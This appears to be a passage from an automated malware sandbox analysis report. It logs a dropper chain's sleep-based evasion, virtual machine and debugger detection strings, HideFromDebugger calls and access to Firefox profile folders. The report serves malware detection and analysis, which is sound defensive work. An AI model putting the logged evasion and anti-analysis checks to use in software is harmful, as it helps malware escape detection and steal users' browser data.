                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6656Thread sleep count: 841 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6656Thread sleep time: -1682841s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6632Thread sleep count: 1355 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6632Thread sleep time: -2711355s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6940Thread sleep count: 1330 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe TID: 6940Thread sleep time: -2661330s >= -30000s
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe TID: 3960Thread sleep time: -1844674407370954s >= -30000s
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe TID: 2504Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exe TID: 7964Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 1784Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 5688Thread sleep count: 1248 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 5688Thread sleep time: -2497248s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4480Thread sleep count: 1218 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4480Thread sleep time: -2437218s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2476Thread sleep time: -44000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 8Thread sleep count: 1220 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 8Thread sleep time: -2441220s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4348Thread sleep count: 1232 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4348Thread sleep time: -2465232s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 6364Thread sleep time: -210000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2492Thread sleep count: 1237 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2492Thread sleep time: -2475237s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4500Thread sleep count: 1217 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4500Thread sleep time: -2435217s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6716Thread sleep count: 113 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6716Thread sleep time: -226113s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6788Thread sleep count: 132 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6788Thread sleep time: -264132s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6740Thread sleep count: 126 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6740Thread sleep time: -252126s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 3928Thread sleep time: -32000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6828Thread sleep count: 109 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6828Thread sleep time: -218109s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6764Thread sleep count: 115 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 6764Thread sleep time: -230115s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4992Thread sleep count: 83 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4992Thread sleep time: -166083s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 7316Thread sleep count: 114 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 7316Thread sleep time: -228114s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 1260Thread sleep count: 145 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 1260Thread sleep time: -290145s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2872Thread sleep count: 134 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2872Thread sleep time: -268134s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 1780Thread sleep time: -44000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2948Thread sleep count: 157 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2948Thread sleep time: -314157s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2892Thread sleep time: -240000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4588Thread sleep count: 111 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 4588Thread sleep time: -222111s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 1720Thread sleep count: 160 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 1720Thread sleep time: -320160s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2056Thread sleep count: 155 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe TID: 2056Thread sleep time: -310155s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe TID: 2264Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 5596Thread sleep time: -58029s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 7980Thread sleep time: -56028s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 2284Thread sleep time: -38019s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 7720Thread sleep count: 238 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 7720Thread sleep time: -1428000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe TID: 4824Thread sleep time: -50025s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe TID: 7304Thread sleep count: 547 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe TID: 7304Thread sleep count: 58 > 30
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe TID: 7516Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 4564Thread sleep time: -34017s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 5836Thread sleep time: -30015s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 2668Thread sleep time: -30015s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 3272Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 4144Thread sleep time: -34017s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 7908Thread sleep time: -34017s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe TID: 4040Thread sleep time: -30015s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exeThread sleep count: Count: 1213 delay: -10
                              Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002E36A9 FindFirstFileExW,9_2_002E36A9
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002E375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_002E375A
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 100000
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99842
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99718
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99563
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99437
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99328
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99218
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99109
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 99000
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98889
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98765
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98656
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98547
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98437
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98306
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98171
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 98038
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 97471
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 97358
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 97201
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 97085
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96984
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96859
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96749
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96640
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96517
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96390
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96268
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96156
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 96047
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95922
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95812
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95703
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95593
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95462
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95350
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 95203
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94687
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94562
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94449
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94460
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94294
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94171
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 94030
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93890
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93765
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93640
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93528
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93359
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 93231
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 596067
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595936
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595609
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 595097
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594922
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594750
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594633
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 594484
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash10755\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
                              Source: file.exe, 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1671121237.0000000000DB6000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000000.1690475731.0000000001096000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000000.1698893785.0000000001096000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000000.2315087895.0000000001096000.00000080.00000001.01000000.00000008.sdmp, 6f3b41816f.exe, 00000021.00000002.3346263388.0000000000E39000.00000040.00000001.01000000.0000001F.sdmp, 6f3b41816f.exe, 00000021.00000000.3170259918.0000000000E39000.00000080.00000001.01000000.0000001F.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeF
                              Source: 85746525a0.exe, 0000000B.00000002.3044100078.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021062186.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW83
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                              Source: 81d22383f9.exe, 0000000C.00000002.2820567838.0000000000736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: ed7d415177.exe, 0000001E.00000003.3529309223.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3653308525.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3445606549.000000000177D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
                              Source: 85746525a0.exe, 0000000B.00000003.2841686209.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3036597865.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997775021.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3065930710.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2814280047.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021062186.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2797362552.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2926346115.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_r
                              Source: 932bb971c3.exe, 00000013.00000003.2743164268.0000000001A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                              Source: 85746525a0.exe, 85746525a0.exe, 0000000B.00000003.2841686209.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3036597865.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2997775021.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000002.3065930710.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2814280047.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.3021062186.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2797362552.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2926346115.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3428608134.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                              Source: firefox.exe, 00000030.00000002.3462121451.0000022389EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                              Source: 932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                              Source: bc893816fa.exe, 0000001F.00000003.3076106577.0000000000C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMSAFD RfComm [Bluetooth]
                              Source: 932bb971c3.exe, 00000013.00000003.2756695909.0000000006AC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zpjzY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
                              Source: file.exe, 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1671121237.0000000000DB6000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000000.1690475731.0000000001096000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000000.1698893785.0000000001096000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1747899419.0000000001096000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000000.2315087895.0000000001096000.00000080.00000001.01000000.00000008.sdmp, 6f3b41816f.exe, 00000021.00000002.3346263388.0000000000E39000.00000040.00000001.01000000.0000001F.sdmp, 6f3b41816f.exe, 00000021.00000000.3170259918.0000000000E39000.00000080.00000001.01000000.0000001F.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: 81d22383f9.exe, 0000000C.00000002.2820567838.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3152798790.0000015C224DB000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3126131919.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3141578569.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3152874394.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3105852328.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3144733399.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3168885303.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3132840879.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, bc893816fa.exe, 0000001F.00000003.3156605158.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_1-10026
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_1-10047
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10027
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10048
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeAPI call chain: ExitProcess graph end nodegraph_9-14945
                              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeThread information set: HideFromDebugger
